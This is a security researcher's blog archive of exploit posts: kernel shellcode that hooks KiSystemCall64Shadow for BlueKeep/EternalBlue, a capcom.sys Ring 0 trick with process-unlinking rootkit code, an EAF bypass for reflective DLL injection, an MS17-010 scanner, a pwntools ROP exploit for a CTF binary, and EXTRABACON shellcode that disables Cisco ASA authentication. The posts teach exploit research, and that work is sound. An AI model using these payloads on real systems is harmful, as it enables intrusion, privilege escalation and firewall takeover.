zerosum0x0: exploit

Showing posts with label exploit. Show all posts

Thursday, November 7, 2019

Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow

Update 11/8/2019: @sleepya_ informed me that the call-site for BlueKeep shellcode is actually at PASSIVE_LEVEL. Some parts of the call gadget function acquire locks and raise IRQL, causing certain crashes I saw during early exploit development. In short, payloads can be written that don't need to deal with KVA Shadow. However, this writeup can still be useful for kernel exploits such as EternalBlue and possibly future others.

Background

BlueKeep is a fussy exploit. In a lab environment, the Metasploit module can be a decently reliable exploit*. But out in the wild on penetration tests the results have been... lackluster.

While I mostly blamed my failed experiences on the mystical reptilian forces that control everything, something inside me yearned for a more difficult explanation.

After the first known BlueKeep attacks hit this past weekend, a tweet by sleepya slipped under the radar, but immediately clued me in to at least one major issue.

From call stack, seems target has kva shadow patch. Original eternalblue kernel shellcode cannot be used on kva shadow patch target. So the exploit failed while running kernel shellcode
— Worawit Wang (@sleepya_) November 3, 2019

Turns out my BlueKeep development labs didn't have the Meltdown patch, yet out in the wild it's probably the most common case.

tl;dr: Side effects of the Meltdown patch inadvertently breaks the syscall hooking kernel payloads used in exploits such as EternalBlue and BlueKeep. Here is a horribly hacky way to get around it... but: it pops system shells so you can run Mimikatz, and after all isn't that what it's all about?

Galaxy Brain tl;dr: Inline hook compatibility for both KiSystemCall64Shadow and KiSystemCall64 instead of replacing IA32_LSTAR MSR.

PoC||GTFO: Experimental MSF BlueKeep + Meltdown Diff GitHub

* Fine print: BlueKeep can be reliable with proper knowledge of the NPP base address, which varies radically across VM families due to hotfix memory increasing the PFN table size. There's also an outstanding issue or two with the lock in the channel structure, but I digress.

Meltdown CPU Vulnerability

Meltdown (CVE-2017-5754), released alongside Spectre as "Variant 3", is a speculative execution CPU bug announced in January 2018.

As an optimization, modern processors are loading and evaluating and branching ("speculating") way before these operations are "actually" to be run. This can cause effects that can be measured through side channels such as cache timing attacks. Through some clever engineering, exploitation of Meltdown can be abused to read kernel memory from a rogue userland process.

KVA Shadow

Windows mitigates Meltdown through the use of Kernel Virtual Address (KVA) Shadow, known as Kernel Page-Table Isolation (KPTI) on Linux, which are differing implementations of the KAISER fix in the original whitepaper.

When a thread is in user-mode, its virtual memory page tables should not have any knowledge of kernel memory. In practice, a small subset of kernel code and structures must be exposed (the "Shadow"), enough to swap to the kernel page tables during trap exceptions, syscalls, and similar.

Switching between user and kernel page tables on x64 is performed relatively quickly, as it is just swapping out a pointer stored in the CR3 register.

KiSystemCall64Shadow Changes

The above illustrated process can be seen in the patch diff between the old and new NTOSKRNL system call routines.

Here is the original KiSystemCall64 syscall routine (before Meltdown):

The swapgs instruction changes to the kernel gs segment, which has a KPCR structure at offset 0. The user stack is stored at gs:0x10 (KPCR->UserRsp) and the kernel stack is loaded from gs:0x1a8 (KPCR->Prcb.RspBase).

Compare to the KiSystemCall64Shadow syscall routine (after the Meltdown patch):

Swap to kernel GS segment
Save user stack to KPCR->Prcb.UserRspShadow
Check if KPCR->Prcb.ShadowFlags first bit is set

Set CR3 to KPCR->Prcb.KernelDirectoryTableBase

Load kernel stack from KPCR->Prcb.RspBaseShadow

The kernel chooses whether to use the Shadow version of the syscall at boot time in nt!KiInitializeBootStructures, and sets the ShadowFlags appropriately.

NOTE: I have highlighted the common push 2b instructions above, as they will be important for the shellcode to find later on.

Existing Remote Kernel Payloads

The authoritative guide to kernel payloads is in Uninformed Volume 3 Article 4 by skape and bugcheck. There you can read all about the difficulties in tasks such as lowering IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL, as well as moving code execution out from Ring 0 and into Ring 3.

Hooking IA32_LSTAR MSR

In both EternalBlue and BlueKeep, the exploit payloads start at the DISPATCH_LEVEL IRQL.

To oversimplify, on Windows NT the processor Interrupt Request Level (IRQL) is used as a sort of locking mechanism to prioritize different types of kernel interrupts. Lowering the IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL is a requirement to access paged memory and execute certain kernel routines that are required to queue a user mode APC and escape Ring 0. If IRQL is dropped artificially, deadlocks and other bugcheck unpleasantries can occur.

One of the easiest, hackiest, and KPP detectable ways (yet somehow also one of the cleanest) is to simply write the IA32_LSTAR (0xc000082) MSR with an attacker-controlled function. This MSR holds the system call function pointer.

User mode executes at PASSIVE_LEVEL, so we just have to change the syscall MSR to point at a secondary shellcode stage, and wait for the next system call allowing code execution at the required lower IRQL. Of course, existing payloads store and change it back to its original value when they're done with this stage.

Double Fault Root Cause Analysis

Hooking the syscall MSR works perfectly fine without the Meltdown patch (not counting Windows 10 VBS mitigations, etc.). However, if KVA Shadow is enabled, the target will crash with a UNEXPECTED_KERNEL_MODE_TRAP (0x7F) bugcheck with argument EXCEPTION_DOUBLE_FAULT (0x8).

We can see that at this point, user mode can see the KiSystemCall64Shadow function:

However, user mode cannot see our shellcode location:

The shellcode page is NOT part of the KVA Shadow code, so user mode doesn't know of its existence. The kernel gets stuck in a recursive loop of trying to handle the page fault until everything explodes!

Hooking KiSystemCall64Shadow

So the Galaxy Brain moment: instead of replacing the IA32_LSTAR MSR with a fake syscall, how about just dropping an inline hook into KiSystemCall64Shadow? After all, the KVASCODE section in ntoskrnl is full of beautiful, non-paged, RWX, padded, and userland-visible memory.

Heuristic Offset Detection

We want to accomplish two things:

Install our hook in a spot after kernel pages CR3 is loaded.
Provide compatibility for both KiSystemCall64Shadow and KiSystemCall64 targets.

For this reason, I scan for the push 2b sequence mentioned earlier. Even though this instruction is 2-bytes long (also relevant later), I use a 4-byte heuristic pattern (0x652b6a00 little endian) as the preceding byte and following byte are stable in all versions of ntoskrnl that I analyzed.

The following shellcode is the 0th stage that runs after exploitation:

payload_start:
; read IA32_LSTAR
    mov ecx, 0xc0000082         
    rdmsr

    shl rdx, 0x20
    or rax, rdx                 
    push rax

; rsi = &KiSystemCall64Shadow
    pop rsi                      

; this loop stores the offset to push 2b into ecx
_find_push2b_start:
    xor ecx, ecx
    mov ebx, 0x652b6a00

_find_push2b_loop:
    inc ecx
    cmp ebx, dword [rsi + rcx - 1]
    jne _find_push2b_loop

This heuristic is amazingly solid, and keeps the shellcode portable for both versions of the system call. There are even offset differences between the Windows 7 and Windows 10 KPCR structure that don't matter thanks to this method.

The offset and syscall address are stored in a shared memory location between the two stages, for dealing with the later cleanup.

Atomic x64 Function Hooking

It is well known that inline hooking on x64 comes with certain annoyances. All code overwrites need to be atomic operations in order to not corrupt the executing state of other threads. There is no direct jmp imm64 instruction, and early x64 CPUs didn't even have a lock cmpxchg16b function!

Fortunately, Microsoft has hotpatching built into its compiler. Among other things, this allows Microsoft to patch certain functionality or vulnerabilities of Windows without needing to reboot the system, if they like. Essentially, any function that is hotpatch-able gets padded with NOP instructions before its prologue. You can put the ultimate jmp target code gadgets in this hotpatch area, and then do a small jmp inside of the function body to the gadget.

We're in x64 world so there's no classic mov edi, edi 2-byte NOP in the prologue; however in all ntoskrnl that I analyzed, there were either 0x20 or 0x40 bytes worth of NOP preceding the system call routine. So before we attempt to do anything fancy with the small jmp, we can install the BIG JMP function to our fake syscall:

; install hook call in KiSystemCall64Shadow NOP padding
install_big_jmp:

; 0x905748bf = nop; push rdi; movabs rdi &fake_syscall_hook;
    mov dword [rsi - 0x10], 0xbf485790 
    lea rdi, [rel fake_syscall_hook]
    mov qword [rsi - 0xc], rdi

; 0x57c3 = push rdi; ret;
    mov word [rsi - 0x4], 0xc357

; ... 

fake_syscall_hook:

; ...

Now here's where I took a bit of a shortcut. Upon disassembling C++ std::atomic<std::uint16_t>, I saw that mov word ptr is an atomic operation (although sometimes the compiler will guard it with the poetic mfence).

Fortunately, small jmp is 2 bytes, and the push 2b I want to overwrite is 2 bytes.

; install tiny jmp to the NOP padding jmp
install_small_jmp:

; rsi = &syscall+push2b
    add rsi, rcx

; eax = jmp -x
; fix -x to actual offset required
    mov eax, 0xfeeb
    shl ecx, 0x8
    sub eax, ecx
    sub eax, 0x1000

; push 2b => jmp -x;
    mov word [rsi], ax

And now the hooks are installed (note some instructions are off because of x64 instruction variable length and alignment):

On the next system call: the kernel stack and page tables will be loaded, our small jmp hook will goto big jmp which will goto our fake syscall handler at PASSIVE_LEVEL.

Cleaning Up the Hook

Multiple threads will enter into the fake syscall, so I use the existing sleepya_ locking mechanism to only queue a single APC with a lock:

; this syscall hook is called AFTER kernel stack+KVA shadow is setup
fake_syscall_hook:

; save all volatile registers
    push rax
    push rbp
    push rcx
    push rdx
    push r8
    push r9
    push r10
    push r11

    mov rbp, STAGE_SHARED_MEM

; use lock cmpxchg for queueing APC only one at a time
single_thread_gate:
    xor eax, eax
    mov dl, 1
    lock cmpxchg byte [rbp + SINGLE_THREAD_LOCK], dl
    jnz _restore_syscall

; only 1 thread has this lock
; allow interrupts while executing ring0 to ring3
    sti
    call r0_to_r3
    cli

; all threads can clean up
_restore_syscall:

; calculate offset to 0x2b using shared storage
    mov rdi, qword [rbp + STORAGE_SYSCALL_OFFSET]
    mov eax, dword [rbp + STORAGE_PUSH2B_OFFSET]
    add rdi, rax

; atomic change small jmp to push 2b
    mov word [rdi], 0x2b6a

All threads restore the push 2b, as the code flow results in less bytes, no extra locking, and shouldn't matter.

Finally, with push 2b restored, we just have to restore the stack and jmp back into the KiSystemCall64Shadow function.

_syscall_hook_done:

; restore register values
    pop r11
    pop r10
    pop r9
    pop r8
    pop rdx
    pop rcx
    pop rbp
    pop rax

; rdi still holds push2b offset!
; but needs to be restored

; do not cause bugcheck 0xc4 arg1=0x91
    mov qword [rsp-0x20], rdi
    pop rdi

; return to &KiSystemCall64Shadow+push2b
    jmp [rsp-0x28]

You end up with a small chicken and egg problem at the end. You want to keep the stack pristine. My first naive solution ended in a DRIVER_VERIFIER_DETECTED_VIOLATION (0xc4) bugcheck, so I throw the return value deep in the stack out of laziness.

Conclusion

Here is a BlueKeep exploit with the new payload against the February 20, 2019 NT kernel, one of the more likely scenarios for a target patched for Meltdown yet still vulnerable to BlueKeep. The Meterpreter session stays alive for a few hours so I'm guessing KPP isn't fast enough just like with the IA32_LSTAR method.

It's simple, it's obvious, it's hacky; but it works and so it's what you want.

Saturday, July 1, 2017

Puppet Strings - Dirty Secret for Windows Ring 0 Code Execution

Update July 3, 2017: FuzzySec has also previously written some info about this.

Ever since I began reverse engineering Shadow Brokers dumps [1] [2] [3], I've gotten into the habit of codenaming my projects. This trick is called Puppet Strings , and it lets you hitch a free ride into Ring 0 (kernel mode) on Windows.

Some nation-state malware, such as Backdoor.Remsec by the ProjectSauron/Strider APT and Trojan.Turla by the Turla APT, performs a similar operation. However, the traditional nation-state modus operandi involves 0-day exploitation.

But why waste 0-days when you can use kn0wn-days?

Premise

If you're running as an elevated admin, you're allowed to load (signed) drivers.
- Local users are almost always admins.
- UAC is known to be fundamentally broken.
Load any (signed) driver with a kn0wn code execution vulnerability and exploit it.
- It's a fairly obvious idea, and elementary to perform.
- Windows does not have robust certificate revocation.
  - Thus, the DSE trust model is fundamentally broken!

Ordinarily, Ring 0 is forbidden unless you have an approved Extended Validation (EV) Code-Signing Certificate (out of reach for most, especially for malicious purposes). There is a "Driver Signature Enforcement" (DSE) security feature present in all modern 64-bit versions of Windows.

This enforcement can only be "officially" bypassed in two ways: attaching a kernel debugger or configuration at the advanced boot options menu. While these are common procedures for driver developers, they are highly-atypical actions for the average user.

That's right, I'm talking about simply loading high-profile vulnerable drivers like capcom.sys:

oh dear god this capcom.sys has an ioctl that disables smep and calls a provided function pointer, and sets SMEP back what even pic.twitter.com/jBCXO7YtNe
— slipstream/RoL (@TheWack0lian) September 23, 2016

Originally introduced in September 2016 as a form of video game anti-cheat, it was quickly discovered that the capcom.sys driver has an ioctl which disables Supervisor Mode Execution Prevention (SMEP) and executes a provided Ring 3 (user mode) function pointer with Ring 0 privileges. It's even kind enough to pass you a function pointer to MmGetSystemRoutineAddress(), which is basically like GetProcAddress() but for ntoskrnl.exe exports.

The unfortunate part is it can still be easily loaded and exploited to this day.

My opinion: file reputation for signed binaries should factor in cert validity period, revocation, digest algorithm, and file prevalence.
— Matt Graeber (@mattifestation) June 24, 2017

If a driver is signed with a valid timestamp, it also doesn't matter if the certificate has expired, as long as it isn't revoked. This trick is only possible because the Microsoft and root CA mechanisms for revoking driver signatures seems bad. This halfhearted approach violates the trust model that public key infrastructure is supposed to be built upon, as defined in the X.509 standard. Perhaps like UAC it is not a security boundary?

Capcom.sys has been around for almost a year, and is easily one of the most well-known and simplest driver exploits of all time.

While this driver is flagged 15/61 on VirusTotal, I have a personal list of known-vulnerable drivers that are 0/61 detection. They aren't too hard to find if you keep your eyes open to netsec news.

Proof of Concept

Code is available on GitHub at zerosum0x0/puppetstrings. To run it, you will need to independently obtain the capcom.sys driver (I don't want to deal with weird licensing issues).

Test system was Windows 10 x64 Redstone 3 (Insider pre-release), just to show the new Driver Signing Policies (and its list of exceptions) introduced in Redstone 1 do not address this issue. This works on all versions of Windows if you update the EPROCESS.ActiveProcessLinks offset.

1: kd> dt !_EPROCESS ActiveProcessLinks
   +0x2e8 ActiveProcessLinks : _LIST_ENTRY

For the PoC, I had to do something relatively malicious to get the point across. Getting to Ring 0 with this technique is simple, doing something interesting once there is more difficult (e.g. we can already load drivers, the usual SYSTEM shell can be obtained through less dangerous methods).

I load capcom.sys, pass it a function which performs the old rootkit technique of unlinking the current process from the EPROCESS.ActiveProcessLinks circularly-linked list, and then unload capcom.sys. This methodology is instant and makes the current process not show up in user mode tools like tasklist.exe.

static void rootkit_unlink(PEPROCESS pProcess)
{
 static const DWORD WIN10_RS3_OFFSET = 0x2e8;

 PLIST_ENTRY plist = 
  (PLIST_ENTRY)((LPBYTE)pProcess + WIN10_RS3_OFFSET);

 *((DWORD64*)plist->Blink) = (DWORD64)plist->Flink;
 *((DWORD64*)plist->Flink + 1) = (DWORD64)plist->Blink;

 plist->Flink = (PLIST_ENTRY) &(plist->Flink);
 plist->Blink = (PLIST_ENTRY) &(plist->Flink);
}

Of course, doing this in a modern rootkit is foolish, as PatchGuard has at least 4 different process list checks (CRITICAL_STRUCTURE_CORRUPTION Bug Check Arg4 = 4, 5, 1A, and 1B). But you can get experimental and think of something else cool to do, as you enjoy all of the freedoms Ring 0 brings.

DOUBLEPULSAR showed us there's a lot of creative ideas to run in the kernel, even outside of a driver context. DSEFix exploits the same vulnerable VirtualBox driver used by Trojan.Turla to disable Driver Signature Enforcement entirely. It's even possible to use some undocumented features to create a reflectively-loaded driver, if one were so inclined...

If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

Proposed Windows 10 EAF/EMET "Bypass" for Reflective DLL Injection

Windows 10 Redstone 3 (Fall Creator's Update) is adding Exploit Guard, bringing EMET's Export Address Table Access Filtering (EAF) mitigation, among others, to the system. We are still living in a golden era of Windows exploitation and post-exploitation, compared to the way things will be once the world moves onto Windows 10. This is a mitigation that will need to be bypassed sooner or later.

EAF sets hardware breakpoints that check for legitimate access when the function exports of KERNEL32.DLL and NTDLL.DLL are read. It does this by checking if the offending caller code is part of a legitimately loaded module (which reflective DLL injection is not). EAF+ adds another breakpoint for KERNELBASE.DLL. One bypass was searching a DLL such as USER32.DLL for its imports, however Windows 10 will also be adding the brand new Import Address Table Access Filtering (IAF).

So how can we avoid the EAF exploit mitigation? Simple, reflective DLLs, just like normal DLLs, take an LPVOID lpParam. Currently, the loader code does nothing with this besides forwarding it to DllMain. We can allocate and pass a pointer to this struct.

#pragma pack(1)
typedef struct _REFLECTIVE_LOADER_INFO
{

    LPVOID  lpRealParam;
    LPVOID  lpDosHeader;
    FARPROC fLoadLibraryA;
    FARPROC fGetProcAddress;
    FARPROC fVirtualAlloc;
    FARPROC fNtFlushInstructionCache;
    FARPROC fVirtualLock;

} REFLECTIVE_LOADER_INFO, *PREFLECTIVE_LOADER_INFO;

Instead of performing two allocations, we could also shove this information in a code cave at start of the ReflectiveLoader(), or in the DOS headers. I don't think DOS headers are viable for Metasploit, which inserts shellcode there (that does some MSF setup and jumps to ReflectiveLoader(), so you can start execution at offset 0), but perhaps in the stub between the DOS->e_lfanew field and the NT headers.

Reflective DLLs search backwards in memory for their base MZ DOS header address, requiring a second function with the _ReturnAddress() intrinsic. We know this information and can avoid the entire process (note: method not possible if we shove in DOS headers).

Likewise, the addresses for the APIs we need are also known information before the reflective loader is called. While it's true that there is full ASLR for most loaded DLL modules these days, KERNEL32.DLL and NTDLL.DLL are only randomized upon system boot. Unless we do something weird, the addresses we see in the injecting process will be the same as in the injected process.

In order to get code execution to the point of being able to inject code in another process, you need to be inside of a valid context or previously have necessary function pointers anyways. Since EAF does not alert from a valid context, obtaining pointers in the first place should not be an issue. From there, chaining this method with migration is not a problem.

This kind of removes some of the novelty from reflective DLL injection. It's known that instead of self-loading, it's possible to perform the loader code from the injector (this method is seen in powerkatz.dll [PowerShell Empire's Mimikatz] and process hollowing). However, recently there was a circumstance where I was forced to use reflective injection due to the constraints I was working within. More on that at a later time, but reflective DLL injection, even with this extra step, still has plenty of uses and is highly coupled to the tools we're currently using... This is a simple fix when the issue comes up.

Tuesday, April 18, 2017

MS17-010 (SMB RCE) Metasploit Scanner Detection Module

Update April 21, 2017 - There is an active pull request at Metasploit master which adds DoublePulsar infection detection to this module.

During the first Shadow Brokers leak, my colleagues at RiskSense and I reverse engineered and improved the EXTRABACON exploit, which I wrote a feature about for PenTest Magazine. Last Friday, Shadow Brokers leaked FuzzBunch, a Metasploit-like attack framework that hosts a number of Windows exploits not previously seen. Microsoft's official response says these exploits were fixed up in MS17-010, released in mid-March.

Yet again I find myself tangled up in the latest Shadow Brokers leak. I actually wrote a scanner to detect MS17-010 about 2-3 weeks prior to the leak, judging by the date on my initial pull request to Metasploit master. William Vu, of Rapid7 (and whom coincidentally I met in person the day of the leak), added some improvements as well. It was pulled into the master branch on the day of the leak. This module can be used to scan a network range (RHOSTS) and detect if the patch is missing or not.

Module Information Page
https://rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010

Module Source Code
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

My scanner module connects to the IPC$ tree and attempts a PeekNamedPipe transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. After the patch, Win10 returns "STATUS_ACCESS_DENIED" and other Windows versions "STATUS_INVALID_HANDLE". In case none of these are detected, the module says it was not able to detect the patch level (I haven't seen this in practice).

IPC$ is the "InterProcess Communication" share, which generally does not require valid SMB credentials in default server configurations. Thus this module can usually be done as an unauthed scan, as it can log on as the user "\" and connect to IPC$.

This is the most important patch for Windows in almost a decade, as it fixes several remote vulnerabilities for which there are now public exploits (EternalBlue, EternalRomance, and EternalSynergy).

These are highly complex exploits, but the FuzzBunch framework essentially makes the process as easy as point and shoot. EternalRomance does a ridiculous amount of "grooming", aka remote heap feng shui. In the case of EternalBlue, it spawns numerous threads and simultaneously exploits SMBv1 and SMBv2, and seems to talk Cairo, an undocumented SMB LanMan alternative (only known because of the NT4 source code leaks). I haven't gotten around to looking at EternalSynergy yet.

I am curious to learn more, but have too many side projects at the moment to spend my full efforts investigating further. And unlike EXTRABACON, I don't see any "obvious" improvements other than I would like to see an open source version.

Saturday, November 26, 2016

Overflow Exploit Pattern Generator - Online Tool

Metasploit's pattern generator is a great tool, but Ruby's startup time is abysmally slow. Out of frustration, I made this in-browser online pattern generator written in JavaScript.

Generate Overflow Pattern

Find Overflow Offset

For the unfamiliar, this tool will generate a non-repeating pattern. You drop it into your exploit proof of concept. You crash the program, and see what the value of your instruction pointer register is. You type that value in to find the offset of how big your buffer should be overflowed before you hijack execution.

Sunday, November 6, 2016

Hack the Vote CTF "IRS" Solution

RPISEC ran a capture the flag called Hack the Vote 2016 that was themed after the election. In the competition was the "IRS" challenge by pigeon.

IRS challenge clue:

Good day fellow Americans. In the interest of making filing your tax returns as easy and painless as possible, we've created this nifty lil' program to better serve you! Simply enter your name and file away! And don't you worry, everyone's file is password protected ;)

We get a pwnable x86 ELF Linux binary with non-executable stack. There's also details for a server to ncat to to exploit it.

The program contains about 10 functions that are relatively straightforward about what they do just going off the strings. Exploring the program, there is a blatant address leak when there is an attempt to create more than 5 total users in the system.

This %p is given to puts(). It dereferences to a pointer address that is the start of an array of structs which hold IRS tax return data. Here is the initialization code for Trump's struct:

Note that Trump's password is "not_the_flag" here, but on the server it will be the flag.

Preceding Trump's struct construction is a call to malloc() with 108 bytes, and throughout the program we only see 4 distinct fields. So the completed struct most likely is:

struct IRS_Data
{
    char name[50];
    char pass[50];
    int32_t income;
    int32_t deductibles;
};

In a function which I named edit_tax_return(), there is a call to gets(). This is a highly vulnerable C function that writes to a buffer from stdin with no constraints on length, and thus should probably never be used.

The exploitation process can be pretty simple if you take advantage of other functions present in the binary.

Create enough users to leak the user array pointer
Overflow the gets() in edit_tax_return() with a ROP chain
ROP #1 calls view_tax_return() with the leaked pointer and index 0 (a.k.a. Trump)
ROP #2 cleanly returns back to the start of main()

#!/usr/bin/env python2
from pwn import *

#r = remote("irs.pwn.republican", 4127)
r = process('./irs.4ded.3360.elf')

r.send("1\n"*21)                # create a bunch of fake users
r.recvuntil("0x")               # get the leaked %p address

database_addr = int(r.recvline().strip(), 16)
log.success("Got leaked address %08x" % database_addr)

r.send("3\n"+"1\n"*4)           # edit a known user record

overflow = "A"*25
overflow += p32(0x0804892C)     # print_tax_return(pDB, i)
overflow += p32(0x08048a39)     # main(void), safe return
overflow += p32(database_addr)  # pDB
overflow += p32(0x00000000)     # i

r.send(overflow + "\n")         # 08048911    call    gets

r.recvuntil("Password: ")       # print_tax_return() Trump password

flag = r.recvline().split(" ")[0]
log.success(flag)

Saturday, September 17, 2016

Reverse Engineering Cisco ASA for EXTRABACON Offsets

Update Sept. 24: auxiliary/admin/cisco/cisco_asa_extrabacon is now in the Metasploit master repo. There is support for the original ExtraBacon leak and ~20 other newer versions.

Update Sept. 22: Check this GitHub repo for ExtraBacon 2.0, improved Python code, a Lina offset finder script, support for a few more 9.x versions, and a Metasploit module.

Background

On August 13, 2016 a mysterious Twitter account (@shadowbrokerss) appeared, tweeting a PasteBin link to numerous news organizations. The link described the process for an auction to unlock an encrypted file that claimed to contain hacking tools belonging to the Equation Group. Dubbed last year by Kaspersky Lab, Equation Group are sophisticated malware authors believed to be part of the Office of Tailored Access Operations (TAO), a cyber-warfare intelligence-gathering unit of the National Security Agency (NSA). As a show of good faith, a second encrypted file and corresponding password were released, with tools containing numerous exploits and even zero-day vulnerabilities.

One of the zero-day vulnerabilities released was a remote code execution in the Cisco Adaptive Security Appliance (ASA) device. The Equation Group's exploit for this was named EXTRABACON. Cisco ASAs are commonly used as the primary firewall for many organizations, so the EXTRABACON exploit release raised many eyebrows.

At RiskSense we had spare ASAs lying around in our red team lab, and my colleague Zachary Harding was extremely interested in exploiting this vulnerability. I told him if he got the ASAs properly configured for remote debugging I would help in the exploitation process. Of course, the fact that there are virtually no exploit mitigations (i.e. ASLR, stack canaries, et al) on Cisco ASAs may have weighed in on my willingness to help. He configured two ASAs, one containing version 8.4(3) (which had EXTRABACON exploit code), and version 9.2(3) which we would target to write new code.

This blog post will explain the methodology for the following submissions to exploit-db.com:

There is detailed information about how to support other versions of Cisco ASA for the exploit. Only a few versions of 8.x were in the exploit code, however the vulnerability affected all versions of ASA, including all of 8.x and 9.x. This post also contains information about how we were able to decrease the Equation Group shellcode from 2 stages containing over 200+ bytes to 1 stage of 69 bytes.

Understanding the Exploit

Before we can begin porting the exploit to a new version, or improving the shellcode, we first need to know how the exploit works.

This remote exploit is your standard stack buffer overflow, caused by sending a crafted SNMP packet to the ASA. From the internal network, it's pretty much a guarantee with the default configuration. We were also able to confirm the attack can originate from the external network in some setups.

Hijacking Execution

The first step in exploiting a 32-bit x86 buffer overflow is to control the EIP (instruction pointer) register. In x86, a function CALL pushes the current EIP location to the stack, and a RET pops that value and jumps to it. Since we overflow the stack, we can change the return address to any location we want.

In the shellcode_asa843.py file, the first interesting thing to see is:

my_ret_addr_len = 4
my_ret_addr_byte = "\xc8\x26\xa0\x09"
my_ret_addr_snmp = "200.38.160.9"

This is an offset in 8.4(3) to 0x09a026c8. As this was a classic stack buffer overflow exploit, my gut told me this was where we would overwrite the RET address, and that there would be a JMP ESP (jump to stack pointer) here. Sometimes your gut is right:

The vulnerable file is called "lina". And it's an ELF file; who needs IDA when you can use objdump?

Stage 1: "Finder"

The Equation Group shellcode is actually 3 stages. After we JMP ESP, we find our EIP in the "finder" shellcode.

finder_len = 9
finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
finder_snmp = "139.124.36.20.139.7.255.224.144"

This code finds some pointer on the stack and jumps to it. The pointer contains the second stage.

We didn't do much investigating here as it was the same static offsets for every version. Our improved shellcode also uses this first stage.

Stage 2: "Preamble"

Observing the main Python source code, we can see how the second stage is made:

        wrapper = sc.preamble_snmp
        if self.params.msg:
            wrapper += "." + sc.successmsg_snmp
        wrapper += "." + sc.launcher_snmp
        wrapper += "." + sc.postscript_snmp

Ignoring successmsg_snmp (as the script --help text says DO NOT USE), the following shellcode is built:

It seems like a lot is going on here, but it's pretty simple.

A "safe" return address is XORed by 0xa5a5a5a5
1. unnecessary, yet this type of XOR is everywhere. The shellcode can contain null bytes so we don't need a mask
Registers smashed by the stack overflow are fixed, including the frame base pointer (EBP)
The fixed registers are saved (PUSHA = push all)
A pointer to the third stage "payload" (to be discussed soon) is found on the stack
- This offset gave us trouble. Luckily our improved shellcode doesn't need it!
Payload is called, and returns
The saved registers are restored (POPA = pop all)
The shellcode returns execution to the "safe" location, as if nothing happened

I'm guessing the safe return address is where the buffer overflow would have returned if not exploited, but we haven't actually investigated the root cause of the vulnerability, just how the exploit works. This is probably the most elusive offset we will need to find, and IDA does not recognize this part of the code section as part of a function.

If we follow the function that is called before our safe return, we can see why there are quite a few registers that need to be cleaned up.

These registers also get smashed by our overflow. If we don't fix the register values, the program will crash. Luckily the cleanup shellcode can be pretty static, with only the EBP register changing a little bit based on how much stack space is used.

Stage 3: "Payload"

The third stage is where the magic finally happens. Normally shellcode, as it is aptly named, spawns a shell. But the Equation Group has another trick up its sleeve. Instead, we patch two functions, which we called "pmcheck()" and "admauth()", to always return true. With these two functions patched, we can log onto the ASA admin account without knowing the correct password.

Note: this is for payload "pass-disable". There's a second payload, "pass-enable", which re-patches the bytes. So after you log in as admin, you can run a second exploit to clean up your tracks.

For this stage, there is payload_PMCHECK_DISABLE_byte and payload_AAAADMINAUTH_DISABLE_byte. These two shellcodes perform the same overall function, just for different offsets, with a lot of code reuse.

Here is the Equation Group PMCHECK_DISABLE shellcode:

There's some shellcode trickery going on, but here are the steps being taken:

First, the syscall to mprotect() marks a page of memory as read/write/exec, so we can patch the code
Next, we jump forward to right before the end of the shellcode
- The last 3 lines of the shellcode contain the code to "always return true"
The call instruction puts the current address (where patch code is) on the stack
The patch code address is pop'd into esi and we jump backwards
rep movs copies 4 bytes (ecx) from esi (source index) to edi (destination index), then we jump to the admauth() patch

The following is functional equivalent C code:

const void *PMCHECK_BOUNDS = 0x954c000;
const void *PMCHECK_OFFSET = 0x954cfd0;

const int32_t PATCH_BYTES = 0xc340c031;

sys_mprotect(PMCHECK_BOUNDS, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
*PMCHECK_OFFSET = PATCH_BYTES;

In this case, PMCHECK_BYTES will be "always return true".

xor eax, eax   ; set eax to 0  -- 31 c0
inc eax        ; increment eax -- 40
ret            ; return        -- c3

Yes, my friends who are fluent in shellcode, the assembly is extremely verbose just to write 4 bytes to a memory location. Here is how we summarized everything from loc_00000025 to the end in the improved shellcode:

mov dword [PMCHECK_OFFSET], PMCHECK_BYTES

In the inverse operation, pass-enable, we will simply patch the bytes to their original values.

Finding Offsets

So now that we've reverse engineered the shellcode, we know what offsets we need to patch to port the exploit to a new Cisco ASA version:

The RET smash, which should be JMP ESP (ff e4) bytes
The "safe" return address, to continue execution after our shellcode runs
The address of pmcheck()
The address of admauth()

RET Smash

We can set the RET smash address to anywhere JMP ESP (ff e4) opcodes appear in an executable section of the binary. There is no shortage of the actual instruction in 9.2(3).

Any of these will do, so we just picked a random one.

Safe Return Address

This is the location to safely return execution to after the shellcode runs. As mentioned, this part of the code isn't actually recognized as a function by IDA, and also the same trick we'll use for the Authentication Functions (searching the assembly with ROPgadget) doesn't work here.

The offset in 8.4(3) is 0xad457e33 ^ 0xa5a5a5a5 = 0x8e0db96

This contains a very unique signature of common bytes we can grep for in 9.2(3).

Our safe return address offset is at 0x9277386.

Authentication Functions

Finding the offsets for pmcheck() and admauth() is pretty simple. The offsets in 8.4(3) are not XORed by 0xa5a5a5a5, but the page alignment for sys_mprotect() is.

We'll dump the pmcheck() function from 8.4(3).

We have the bytes of the function, so we can use the Python ROPGadget tool from Jonathan Salwan to search for those bytes in 9.2(3).

It's a pretty straightforward process, which can be repeated for admauth() offsets. Note that during this process, we get the unpatch bytes needed for the pass-enable shellcode.

Finding the page alignment boundaries for these offsets (for use in sys_mprotect()) is easy as well, just floor to the nearest 0x1000.

Improving the Shellcode

We were able to combine the Equation Group stages "preamble" and "payload" into a single stage by rewriting the shellcode. Here is a list of ways we shortened the exploit code:

Removed all XOR 0xa5a5a5a5 operations, as null bytes are allowed
Reused code for the two sys_mprotect() calls
Used a single mov operation instead of jmp/call/pop/rep movs to patch the code
General shellcode size optimization tricks (performing the same tasks with ops that use less bytes)

The lackadaisical approach to the shellcode, as well as the Python code, came as a bit of surprise as the Equation Group is probably the most elite APT on the planet. There's a lot of cleverness in the code though, and whoever originally wrote it obviously had to be competent. To me, it appears the shellcode is kind of an off-the-shelf solution to solving generic problems, instead of being custom tailored for the exploit.

